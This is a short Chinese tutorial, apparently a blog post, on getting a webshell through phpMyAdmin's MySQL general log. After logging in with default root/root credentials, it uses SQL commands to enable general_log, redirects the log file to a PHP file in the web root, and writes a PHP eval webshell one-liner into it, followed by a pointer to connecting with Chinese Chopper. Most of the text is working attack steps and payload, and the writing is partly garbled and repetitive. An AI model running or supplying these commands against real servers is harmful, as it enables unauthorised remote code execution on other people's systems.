日志文件phpMyAdminGetShell

前言：我的服务器是挂机用的，无趣的时候安装了vc9与phpstudy，并没有挂任何网站，但是也被getshell，后来将www文件夹下面的opp.php改成txt格式我就知道了这是日志法getshell。

首先搞懂什么是phpmyadmin，他就是一个可以远程连接数据库的方便功能。

首先他必须具备phpmyadmin功能

看到登录框了吗？看到路径了吗？

它还需要具备第二个条件，弱口令（包含初始密码）

我就是吃了初始密码的亏

账号为root 密码为root

然后要明白为什么要用日志去搞

因为大于5.0的版本会生成日志

第三个条件，phpmyadmin大于5.0第三个条件，phpmyadmin大于5.0

SELECT @@version , @@version_comment

此时你要想让大马在服务器当中发挥它?作用就需要以php文件的形式存在
所以，就要在日志保存状态（general log）与保存路径（general_log_file）做动作

第四个条件，日志功能开启

set global general_log=on
select @@basedir
 SET global general_log_file='C:/phpStudy/WWW/h4nk.php'

然后就是上大马

SELECT '<?php eval(@$_POST["h4nk"]);?>'

上菜刀